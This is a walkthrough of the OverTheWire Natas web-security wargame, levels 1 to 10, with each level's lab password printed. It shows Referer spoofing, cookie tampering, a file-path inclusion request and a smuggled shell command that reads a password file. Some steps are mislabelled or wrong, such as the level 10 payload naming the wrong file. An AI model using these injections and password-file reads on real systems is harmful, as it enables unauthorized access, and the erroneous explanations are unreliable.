On successfully logging in the natas1 webpage, we will have a message in front of us. It says “You can find the password for the next level on this page, but rightclicking has been blocked!” as shown in the figure given below.
![[Image: 4.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-OSmW4gGriZU/XK4W4eRUrjI/AAAAAAAAd7E/5qtRoC9Vf9AUNnn4SAMWVzUshbhjcsw1QCEwYBhgL/s1600/4.png?w=687)
Now as right-clicking is disabled to view source code, we will have to find another way to retrieve the password form the source code. As we were using Mozilla Firefox and to open source code, we use ‘Ctrl + U’ shortcut. And there we have the password commented in the source code.
![[Image: 5.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-vcsyZuxd1rE/XK4W6lMDHaI/AAAAAAAAd7M/r4umjyItX04fjKEYF8t_6YmsqIUKWTRDACEwYBhgL/s1600/5.png?w=687)
Level 2 → Level 3
We use the credentials we extracted from the previous level to login into Level 2.
Username: natas2
Password: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
On successfully logging in the natas2 webpage, we will have a message in front of us. It says “There is nothing on this page” as shown in the figure given below.
![[Image: 6.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-lve3K4SUhzw/XK4W6womHmI/AAAAAAAAd7M/wJj6JOtzElswrbvxqCSxtrZD6Z28AH7xQCEwYBhgL/s1600/6.png?w=687)
So, we check the Source Code of the page, here we find that we have an image file named pixel.png located in the files directory.
![[Image: 7.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-j6C117gAHWs/XK4W7CfBaGI/AAAAAAAAd7I/OqDqFzBzCFgeO-zCz2v-rN7lUnwsYCKoQCEwYBhgL/s1600/7.png?w=687)
We opened the files directory as shown in the image given below. In this directory, we find the user.txt file.
![[Image: 8.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-KPktYnm4i74/XK4W7ZwQsUI/AAAAAAAAd7M/LREAvaB2d5A_OwkXe8FxyZgPgFXW8dXCgCEwYBhgL/s1600/8.png?w=687)
On opening it we find the passwords for the various users present on the target machine. But we need the password for the natas3.
![[Image: 9.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-vRijGAMTlpQ/XK4W7r0-iEI/AAAAAAAAd7Q/kzJWAl5afPw_oh5Q-ZCbLVH0_jQ9S4UlACEwYBhgL/s1600/9.png?w=687)
Level 3 → Level 4
We use the credentials we extracted from the previous level to login into Level 3.
Username: natas3
Password: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
On successfully logging in the natas3 webpage, we will have a message in front of us. It says “There is nothing on this page” as shown in the figure given below.
![[Image: 10.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-5c6nMtzHB-4/XK4Wsk4zM7I/AAAAAAAAd7I/ZyU3VLj-ptIe6_t52-WiL_Ydxib9IFBwQCEwYBhgL/s1600/10.png?w=687)
So, we check the Source Code of the page, here we find a commented hint. It says “Not even Google will find it this time”. Search Engine spiders always leave the links that are disallowed the robots.txt file. So, we thought to check if this website has one.
![[Image: 11.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-t8m0atFuyqY/XK4WsxuhP7I/AAAAAAAAd7Q/sPI6uOJNFagzr0OSdPr-9-nGO0ZilxIswCEwYBhgL/s1600/11.png?w=687)
We opened the robots.txt as shown in the image given below. In this file, we find that the /s3cr3t/ directory is disallowed. So, let’s open and see for ourselves what’s inside the s3cr3t directory.
![[Image: 12.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-16QoKZ4i7VQ/XK4Wt4rkHrI/AAAAAAAAd7M/P_Z2ygVNgUgLEZUuxNxQlHx4-2jtgFHYQCEwYBhgL/s1600/12.png?w=687)
In this directory, we find the user.txt file.
![[Image: 13.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-R0unGhtzBU8/XK4WtwL3mGI/AAAAAAAAd7A/aazjoIsF8OsnKrw0AALnGnnkt4i7AZ1twCEwYBhgL/s1600/13.png?w=687)
On opening it we find the login credentials of the user natas4.
![[Image: 14.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-U9kPBOYMqg0/XK4Wt9mOURI/AAAAAAAAd7A/5zykiLJoFLU8JA1Lf0_pwYdbA1YQRkKDQCEwYBhgL/s1600/14.png?w=687)
Level 4 → Level 5
We use the credentials we extracted from the previous level to login into Level 4.
Username: natas4
Password: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
On successfully logging in the natas4 webpage, we will have a message in front of us. It says “Access disallowed. You are visiting from “” while authorized users should come only from “//natas5.natas.labs.overthewire.org/” ”as shown in the figure given below.
![[Image: 15.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-Zu-8-sPIEPw/XK4WvFY_kXI/AAAAAAAAd7A/yNWfOQ9_zRMJFyTx3fB-_dSnYELV7WeQwCEwYBhgL/s1600/15.png?w=687)
We capture the request in Burp Suite, here we see that there is a parameter named Referer. It says natas4.
![[Image: 16.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-HtyzPwuyRt8/XK4WvF7oAwI/AAAAAAAAd7E/1MMMgbqRjYYdE28hfrRqQnpUrNwuUju8ACEwYBhgL/s1600/16.png?w=687)
We change that Referer parameter value to Natas5 as shown in the image given below.
![[Image: 17.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-yQrJr1xTM9I/XK4WvjjIeBI/AAAAAAAAd7E/UEds2BnbmN4AzJWn4_OuMgtLHwJvsGOlQCEwYBhgL/s1600/17.png?w=687)
After Forwarding the Request, we get the credentials of the user natas5.
![[Image: 18.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-5vNR0cbVG7o/XK4WwLIfTrI/AAAAAAAAd68/9sMBo30akQg7Zba_TItO5wyDoWUDJUi0ACEwYBhgL/s1600/18.png?w=687)
Level 5 → Level 6
We use the credentials we extracted from the previous level to login into Level 5.
Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
On successfully logging in the natas5 webpage, we will have a message in front of us. It says “Access disallowed. You are not logged in” as shown in the figure given below.
![[Image: 19.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-9iQzs7ZBLs8/XK4WwVMauII/AAAAAAAAd7I/xCH-0CF1Zy4crOeF58uhO6GuP8lSBeElQCEwYBhgL/s1600/19.png?w=687)
We capture the request in Burp Suite, here we see that there is a parameter named loggedin. It is set to 0.
![[Image: 20.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-VG4ElqhlHdA/XK4WxM8fmGI/AAAAAAAAd7Q/zXDf8VOlwcknZFpyJTyUKDht5ykRMQPlwCEwYBhgL/s1600/20.png?w=687)
We change that loggedin parameter value to 1 as shown in the image given below.
![[Image: 21.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-P49YlW7HOZY/XK4WxIcaiuI/AAAAAAAAd7E/vqbocmSTmDgMxOka1Rx2VHHwJ-J0RzUjgCEwYBhgL/s1600/21.png?w=687)
After Forwarding the Request, we get the credentials of the user natas6.
![[Image: 22.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-6zgEv0C1D3I/XK4WxftQAfI/AAAAAAAAd7E/QJH9EpE3KKspgB0WmLs9BRQ0BmQZQvwQwCEwYBhgL/s1600/22.png?w=687)
Level 6 → Level 7
We use the credentials we extracted from the previous level to login into Level 6.
Username: natas6
Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
On successfully logging in the natas6 webpage, we will have a form in front of us. It says “Input secret:” as shown in the figure given below.
![[Image: 23.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-O9wYhfTcUdE/XK4WyJLEbSI/AAAAAAAAd7A/_1LTdtXMvPA8q4IIJx45Y4gQAYNuemJBwCEwYBhgL/s1600/23.png?w=687)
We went ahead and look for some clues for that secret that we will have to enter in order to get the credentials for the next level. Here we see that a file is included called ‘secret.inc’.
![[Image: 24.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-IUAaDtTUk9w/XK4WyjPF1YI/AAAAAAAAd64/U_ckbBtp-gU8MQ3DrcXbcl2oW6NR7WCOwCEwYBhgL/s1600/24.png?w=687)
So, in order to grab the secret, we will browser the included file manually. So, as we can see in the given image, we can see that we add the /include/secret.inc in the URL. This gave us a blank page in response. So, we browsed the source code to find the secret commented on the webpage.
![[Image: 25.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-Fo8OaEcU6hg/XK4WzFuijZI/AAAAAAAAd64/HQZmu3BgN8c62rvh7fnZ7Mty43n0ENvMwCEwYBhgL/s1600/25.png?w=687)
Now we copied the secret and went back to the form which was asking the secret. After entering the secret, we get the login credentials for the next level.
![[Image: 26.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/--SYsHDh0ppI/XK4WzlTIENI/AAAAAAAAd68/ESBJOB0iZMEd1JSuUlgZCEiwrzdZaODcACEwYBhgL/s1600/26.png?w=687)
Level 7 → Level 8
We use the credentials we extracted from the previous level to login into Level 7.
Username: natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
On successfully logging in the natas7 webpage, we are given two links, Home and About as shown in the figure given below.
![[Image: 27.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-vw3qHyRJ8fQ/XK4WzldQ58I/AAAAAAAAd7I/qK0NJTDgmDgBS-gxjyv_05vZtVugao0zgCEwYBhgL/s1600/27.png?w=687)
So, we check the Source Code of the page. Here, we can see the links “index.php?page=” in the given image. We have also hinted the location of the password, that is., /etc/natas_webpass/natas8.
![[Image: 28.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-0caZXkgkQPE/XK4W0TVSvBI/AAAAAAAAd7Q/ASFeAvre4_A1MDzGsejPGhkNnYwZNrC5QCEwYBhgL/s1600/28.png?w=687)
As we can see in the given image, the link is shown in the address bar of our browser after clicking the Home link.
![[Image: 29.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-OOrEcXSRDkA/XK4W05R44NI/AAAAAAAAd64/XnNoA6KVFFQRRggGZJIvO_warDmhDVBOwCEwYBhgL/s1600/29.png?w=687)
So, we modify the link to read the password stored in the natas_webpass.
//natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
And we have the password for the next level. This is called command injection.
![[Image: 30.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-lcQa5QsIMFM/XK4W1ONA_eI/AAAAAAAAd7A/g20fgP0f2UcIuntMcVaeCBY3K_DjQrXCwCEwYBhgL/s1600/30.png?w=687)
Level 8 → Level 9
We use the credentials we extracted from the previous level to login into Level 8.
Username: natas8
Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
On successfully logging in the natas8 webpage, we will have a form in front of us. It says “Input secret:” as shown in the figure given below.
![[Image: 31.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-pjD796TjbQI/XK4W17xAMmI/AAAAAAAAd68/NeFfMl3pIQwHzVNotwvCP3ZdPjNCI6HPACEwYBhgL/s1600/31.png?w=687)
We opened the source code and found that the secret is encoded. Also, we have a function which encodes the secret.
![[Image: 32.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-nJbBwX8x2_E/XK4W2JNToyI/AAAAAAAAd64/8ohft2HwpMo0rZXp6jfyFs3VkQnjLysKACEwYBhgL/s1600/32.png?w=687)
Hence to decode the secrete we just create a function that can decode the secret. This can be done as shown in the given image.
php -a
echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));
1
2
php -a
echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));
![[Image: 33.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-qgTjBXB25fw/XK4W2QdQBiI/AAAAAAAAd7M/Rxh88dFWDowOpIvP4-g8XorzVf13GtGBACEwYBhgL/s1600/33.png?w=687)
As we now have the decoded secret, we can use it extract the credentials from the webpage of natas8 as shown in the given image.
![[Image: 34.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-HjdCiTtpaO0/XK4W2ro9uDI/AAAAAAAAd7A/mVC8zLAZLvchBSGz7wj9LDDLnbWKd-4dACEwYBhgL/s1600/34.png?w=687)
Level 9 → Level 10
We use the credentials we extracted from the previous level to login into Level 9.
Username: natas9
Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
On successfully logging in the natas9 webpage, we will have a form in front of us. It says “Find words containing” as shown in the figure given below.
![[Image: 35.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-zfYNMUuQj9I/XK4W3KdKE2I/AAAAAAAAd7M/x5keCW44XJIAswjEHlUPXQLO5PV4jYbZQCEwYBhgL/s1600/35.png?w=687)
We opened the source code and found that when we enter a keyword, it is passed via a function called passthru(). It takes the value in $key and executes it directly.
![[Image: 36.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-BrJBimar6UE/XK4W3CDqQ1I/AAAAAAAAd7Q/vUEw_7y7qxAyE_xDZoyh9caflV3w5FKFgCEwYBhgL/s1600/36.png?w=687)
So, we will use (
to execute multiple commands. We will try to read the password at the next level.;cat /etc/natas_webpass/natas10
1
;cat /etc/natas_webpass/natas10
![[Image: 37.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-KVC7lDQkU8A/XK4W3jUolSI/AAAAAAAAd68/kTYSMOyGDw8cb_ksT_CEenxf2euffNzxwCEwYBhgL/s1600/37.png?w=687)
As we can see that the password is printed on the screen as shown in the given image.
![[Image: 38.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-VRFlW0R5RBU/XK4W39WLzyI/AAAAAAAAd7A/asUzxZ3wUrUGsVvLZTosoDZcqZctkxNuACEwYBhgL/s1600/38.png?w=687)
Level 10 → Level 11
We use the credentials we extracted from the previous level to login into Level 10.
Username: natas10
Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
On successfully logging in the natas10 webpage, we will have a form in front of us. It says “For security reasons, we now filter on certain characters Find words containing” as shown in the figure given below.
![[Image: 39.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-5VBltCV1HlQ/XK4W4H3BtgI/AAAAAAAAd7I/cUqzPW_sVg47HR0xeB-k21-AW1J116EAACEwYBhgL/s1600/39.png?w=687)
We opened the source code and found that when we enter a keyword, it is passed via a function called passthru(). It takes the value in $key and it filters the input of the characters (/;|&) as shown in the given image.
![[Image: 40.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-ZNUP42924iQ/XK4W4-Ig8bI/AAAAAAAAd7I/TlFtzDIu-Swa6u0M9ZeowplfOQPcKiZgQCEwYBhgL/s1600/40.png?w=687)
So, we will use (.*) to execute multiple commands. We will try to read the password at the next level.
.*/etc/natas_webpass/natas10
1
.*/etc/natas_webpass/natas10
![[Image: 41.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-5Q-OQS3qwkA/XK4W5XiRklI/AAAAAAAAd7I/7GrCYNKAIHMtiDyBhBK10qDp_j8CN7ptACEwYBhgL/s1600/41.png?w=687)
As we can see that the password is printed on the screen as shown in the given image.
![[Image: 42.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-S3gz6fk8PFU/XK4W58QihhI/AAAAAAAAd7E/yFdotmGz_CIYJC8KUo6mSqmuFXI4NuP-wCEwYBhgL/s1600/42.png?w=687)













